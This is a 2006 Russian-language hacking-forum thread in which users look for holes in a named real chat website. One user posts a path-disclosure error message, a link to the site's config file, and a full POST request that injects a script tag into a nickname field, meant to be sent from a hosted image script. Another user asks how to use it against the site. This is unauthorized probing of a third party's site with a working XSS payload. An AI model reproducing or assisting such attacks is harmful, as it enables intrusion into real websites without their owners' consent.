Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.01.2006, 17:36
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Империя
августовский чат, http://www.empirechat.ru/
неплохо всё зализано... ...пытался скрипты запустить, не прокатило...  продолжаю мучить его... просьба, о вашей помощи.... |
|
|
25.01.2006, 17:42
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
кстати, просмотр html кода, там замазан... вообще лажа...
|
|
|
|
25.01.2006, 22:05
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
..хм... ..пол дня ковырял... ..бестолку.. ..или не то делаю, или всё пофиксили...
|
|
|
|
25.01.2006, 22:19
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839
Репутация:
212
|
|
пофиксили, пофиксили...
|
|
|
|
25.01.2006, 22:25
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
я нашел пассивные XSS и раскрытие пути
Код HTML:
<br />
<b>Warning</b>: session_register(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in <b>/vhosts/august4u.ru/htdocs/people/include/lost.inc</b> on line <b>6</b>
|
|
|
|
25.01.2006, 22:27
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839
Репутация:
212
|
|
а где именно там Xss???
|
|
|
|
25.01.2006, 22:45
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
требует от пользователя зайти на твою страничку, но если еще поискать, то можно найти и встроенную
на страничке должна быть картинка-пхпскрипт, отправляющий вот такой пост запрос
POST http://www.empirechat.ru/people/lost HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-powerpoint, application/x-shockwave-flash, application/vnd.ms-excel, application/x-icq, */*
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Host: www.empirechat.ru
Content-Length: 188
Cookie: cid=1763615311; hotlog=1; b=b
PasswordHint=a61d2fc4de414293ba65bafcdd47b84a&nick =administrator<script>alert()</script> |
|
|
|
25.01.2006, 22:46
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
нашел конфигурационный файл, ничего интересного _http://august4u.ru/include/cfg.inc
|
|
|
|
25.01.2006, 22:55
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от max_pain89
требует от пользователя зайти на твою страничку, но если еще поискать, то можно найти и встроенную
на страничке должна быть картинка-пхпскрипт, отправляющий вот такой пост запрос
мля, во первых вынесли из чата... ..и ещё, можно ли, всё что ты написал в цитате, использовать для ковыряния? если да, то подскажи как...
|
|
|
|
27.01.2006, 15:47
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
ЛЮДи, никто ничего не нашёл? или просто все забили?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
